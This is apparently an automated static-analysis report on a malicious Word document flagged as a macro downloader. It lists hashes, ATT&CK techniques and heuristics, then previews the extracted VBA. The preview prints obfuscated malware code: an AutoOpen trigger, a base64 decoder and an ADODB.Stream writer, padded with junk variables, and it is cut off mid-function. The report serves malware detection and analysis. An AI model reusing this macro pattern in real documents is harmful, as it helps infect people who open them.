Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f360bb4e19e9cd37…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 164.0 KB
Created: 2017-05-04 12:19:00
Authoring application: Microsoft Office Word
First seen: 2017-05-13
MD5: 927cc06f4f82c9510ec831212eee1f5f
SHA-1: ae242425fee09659d6f3fa0994abb7a02a16552f
SHA-256: f360bb4e19e9cd374b93ed154f4513f0e1c97082c1aeba12bb79c65284776478
Risk Score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample contains VBA macros with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The presence of a Shell() call and CreateObject() indicates the macro attempts to run external commands or create objects to facilitate payload execution. ClamAV also detected this as a downloader with macros.

Heuristics (8)

  • ClamAV: Doc.Downloader.WithMacro-6310867-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
  • VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17780 bytes
SHA-256: 6ec0d68961d7b3da5a4bd59db242a0e55e29f352f6e28809cee98cb0a28ca7e4

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim EyuKB As Double
EyuKB = Int(7155.0695282082)
Dim sIPemb As Boolean
sIPemb = False
Dim RedAQ As Byte
RedAQ = 69
lJp0BztCS
End Sub

Attribute VB_Name = "Module2"
Public Function pD07K(ByVal YX4mScirl)

Dim U37wJq5pL As Integer
U37wJq5pL = 30167
Dim M70dPoG As Byte
M70dPoG = 49
Dim avuBy5GzD As Double
avuBy5GzD = Int(62736.12786833)
Dim DNJ3Fwy As Single
DNJ3Fwy = Round(51593.969091864)
Dim gzeEjOIhx As Long
gzeEjOIhx = Sgn(0)
Dim Q2yMl
Dim v2fWnPY
Dim r1D8I As String
r1D8I = AscW("u")
Dim ZDtfTCg As Single
ZDtfTCg = Int(44944.131202165)
Dim zI8LiKk As Single
zI8LiKk = Int(60092.79856303)
Dim UDuWZ As Integer
UDuWZ = Sgn(1046)
Dim CfsU9rh As Boolean
CfsU9rh = False
Dim QhLHR2PV As Integer
QhLHR2PV = Sgn(-27507)
Dim BE3bX9eUB
BE3bX9eUB = StrConv(C8nqcB, vbLowerCase)
Dim yjoLZ2s As Double
yjoLZ2s = 30409.024380945
Dim AMZhGrIc9 As Integer
AMZhGrIc9 = Sgn(2244)
Dim dK5Uh1p2k As Double
dK5Uh1p2k = Int(56292.89730527)
Dim syQtY As Byte
syQtY = 197
Set Q2yMl = CreateObject(I9iYFc)
Dim yVEPrJ As Single
yVEPrJ = Sgn(26878.767270423)
Dim zb01jQxRI As Double
zb01jQxRI = Sgn(34549.206252749)
Dim HPqW4cVx
HPqW4cVx = StrConv(IyJzhMd, vbProperCase)
Set v2fWnPY = Q2yMl.CreateElement(u3YLPxnBu)

Dim NpdhGilXB As Boolean
NpdhGilXB = True
Dim oJ4oAlL7r As Double
oJ4oAlL7r = Val(65250.821071462)
Dim dNrVdK45
dNrVdK45 = AscW("1")
Dim Kxc52dpSG As Single
Kxc52dpSG = 60403.714481528
Dim PuFr9 As Long
PuFr9 = 0
With v2fWnPY

Dim VnwAt0DS As Double
VnwAt0DS = 32680.922759321
Dim UjZOMpGd As Double
UjZOMpGd = 52988.725343602
v2fWnPY.DataType = "bin." & u3YLPxnBu

Dim W2l0hxwMb As Byte
W2l0hxwMb = 163
Dim sMhzVrm7i As Boolean
sMhzVrm7i = False
Dim uUiyp As Single
uUiyp = Fix(21184.631437465)
Dim LUHmfEit As Double
LUHmfEit = Round(4108.0022929595)
Dim H0lSK As Long
H0lSK = 0
v2fWnPY.Text = YX4mScirl
End With
Dim ZiHV9yvz As Long
ZiHV9yvz = Sgn(0)
Dim zjkaxp4Pu As Byte
zjkaxp4Pu = 70
Dim FVvqOzN As Boolean
FVvqOzN = True
Dim aluOvPqN As Long
aluOvPqN = Sgn(0)
Dim MECWJk As Boolean
MECWJk = True
pD07K = TzhtX6L(v2fWnPY.nodeTypedValue)

Dim IfT9lqM As Long
IfT9lqM = 0
Dim LuLYCSUh As Double
LuLYCSUh = Round(10041.912183696)
Dim ZbH8PwAih As Integer
ZbH8PwAih = Sgn(-2677)
Dim wfHAt As Integer
wfHAt = Sgn(31867)
Dim IrGPni As Single
IrGPni = Sgn(58774.772984589)
Dim AqyLVSDs As Byte
AqyLVSDs = 83
Set v2fWnPY = Nothing
Set Q2yMl = Nothing
End Function
Function TzhtX6L(Binary)

Dim KYlumveVK As Boolean
KYlumveVK = False
Dim XWulaBKnM As Byte
XWulaBKnM = 98
Dim fKMQt1DWr As Double
fKMQt1DWr = Sgn(47738.889475349)
Dim eEsqo As Integer
eEsqo = Sgn(-31660)
Dim umWd7XJ As Single
umWd7XJ = 45357.506924766
Const EJnXm2 = 2
Const J3ZE1wL = 1
Dim KdLxCbom8 As Single
KdLxCbom8 = Val(59179.110453745)
Dim AwcZM As String
AwcZM = UCase(qjXvgoe)
Dim Vnrg2 As Long
Vnrg2 = 0
Dim klmCBbz As Byte
klmCBbz = 154
Dim UkDogztxQ As Boolean
UkDogztxQ = False
Dim wr7cxAbM As Boolean
wr7cxAbM = True
Dim qvqwK
Dim vj0Gw As Long
vj0Gw = Sgn(0)
Dim yIqrbCEJ As Integer
yIqrbCEJ = -18650
Dim l1GWibtaT As Integer
l1GWibtaT = Sgn(24507)
Dim f7tBgX As Single
f7tBgX = Val(22004.302576695)
Dim UyAXH As Integer
UyAXH = Sgn(8531)

Dim t8ovQREsZ As Single
t8ovQREsZ = 4268.9831173046
Dim URafsFJ As Integer
URafsFJ = 4285
Dim yuyX641xd As Boolean
yuyX641xd = True
Dim ID0GI As Double
ID0GI = Sgn(54707.444007013)
Dim VI8vhwCF As String
VI8vhwCF = Len(dRNbDB)
Set qvqwK = CreateObject("adodb.stream")
Dim zGWvgz1O As String
zGWvgz1O = Val("j")
Dim Lk4zqeId As Single
Lk4zqeId = 21348.194528386
Dim csITcO As Boolean
csITcO = True
Dim TNjFi8h As Integer
TNjFi8h = -16702
Dim Mt064VZ As Boolean
Mt064VZ = False
... (truncated)